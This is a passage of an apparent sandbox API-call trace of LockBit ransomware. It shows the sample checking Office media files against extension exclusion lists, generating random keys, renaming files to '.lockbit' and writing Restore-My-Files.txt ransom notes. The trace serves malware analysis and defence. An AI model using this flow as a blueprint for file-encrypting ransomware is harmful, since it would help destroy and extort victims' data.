[0199.888] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.888] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.889] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18197_.WMF.lockbit") returned 79 [0199.889] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18197_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18197_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.894] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.894] malloc (_Size=0x40068) returned 0x3d70450 [0199.894] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1460) returned 1 [0199.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0199.895] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.895] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0199.895] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.897] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18197_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18197_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.897] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.897] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.899] free (_Block=0x1fa2ed8) [0199.899] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18197_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.899] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.899] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.899] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6adbc800, ftCreationTime.dwHighDateTime=0x1bdfe4c, ftLastAccessTime.dwLowDateTime=0xbcbb3900, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6adbc800, ftLastWriteTime.dwHighDateTime=0x1bdfe4c, nFileSizeHigh=0x0, nFileSizeLow=0x5c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18198_.WMF", cAlternateFileName="")) returned 1 [0199.899] lstrcmpiW (lpString1=".", lpString2="BD18198_.WMF") returned -1 [0199.899] lstrcmpiW (lpString1="..", lpString2="BD18198_.WMF") returned -1 [0199.899] PathFindExtensionW (pszPath="BD18198_.WMF") returned=".WMF" [0199.899] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.899] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.899] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.899] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.899] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.899] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.899] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.900] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.901] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.901] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18198_.WMF") returned 1 [0199.901] lstrcmpiW (lpString1="ntldr", lpString2="BD18198_.WMF") returned 1 [0199.901] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18198_.WMF") returned 1 [0199.902] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18198_.WMF") returned 1 [0199.902] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18198_.WMF") returned -1 [0199.902] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18198_.WMF") returned 1 [0199.902] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18198_.WMF") returned 1 [0199.902] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.902] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18198_.WMF") returned=".WMF" [0199.902] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.902] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.902] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.903] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.903] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18198_.WMF.lockbit") returned 79 [0199.903] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18198_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18198_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.904] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.904] malloc (_Size=0x40068) returned 0x3df0008 [0199.904] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1476) returned 1 [0199.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.905] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.905] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0199.916] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18198_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18198_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.916] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.916] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.917] free (_Block=0x1fa2ed8) [0199.917] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18198_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.918] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.918] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.918] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fdb1800, ftCreationTime.dwHighDateTime=0x1bdcf21, ftLastAccessTime.dwLowDateTime=0xbcbb3900, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2fdb1800, ftLastWriteTime.dwHighDateTime=0x1bdcf21, nFileSizeHigh=0x0, nFileSizeLow=0xc3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18199_.WMF", cAlternateFileName="")) returned 1 [0199.918] lstrcmpiW (lpString1=".", lpString2="BD18199_.WMF") returned -1 [0199.918] lstrcmpiW (lpString1="..", lpString2="BD18199_.WMF") returned -1 [0199.918] PathFindExtensionW (pszPath="BD18199_.WMF") returned=".WMF" [0199.918] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.918] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.919] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.919] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18199_.WMF") returned 1 [0199.919] lstrcmpiW (lpString1="ntldr", lpString2="BD18199_.WMF") returned 1 [0199.919] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18199_.WMF") returned 1 [0199.919] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18199_.WMF") returned 1 [0199.920] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18199_.WMF") returned -1 [0199.920] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18199_.WMF") returned 1 [0199.920] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18199_.WMF") returned 1 [0199.920] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.920] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18199_.WMF") returned=".WMF" [0199.920] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.920] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.920] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.921] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.921] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.921] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.921] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.921] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.921] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.921] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.921] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18199_.WMF.lockbit") returned 79 [0199.921] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18199_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18199_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.922] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.922] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.922] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3132) returned 1 [0199.922] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.922] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.923] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.923] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0199.926] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18199_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18199_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.926] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.926] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.927] free (_Block=0x1fa2ed8) [0199.927] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18199_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.927] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.927] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.927] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd302000, ftCreationTime.dwHighDateTime=0x1bdcf1e, ftLastAccessTime.dwLowDateTime=0xbcbb3900, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfd302000, ftLastWriteTime.dwHighDateTime=0x1bdcf1e, nFileSizeHigh=0x0, nFileSizeLow=0x61c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18200_.WMF", cAlternateFileName="")) returned 1 [0199.927] lstrcmpiW (lpString1=".", lpString2="BD18200_.WMF") returned -1 [0199.927] lstrcmpiW (lpString1="..", lpString2="BD18200_.WMF") returned -1 [0199.927] PathFindExtensionW (pszPath="BD18200_.WMF") returned=".WMF" [0199.928] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.928] 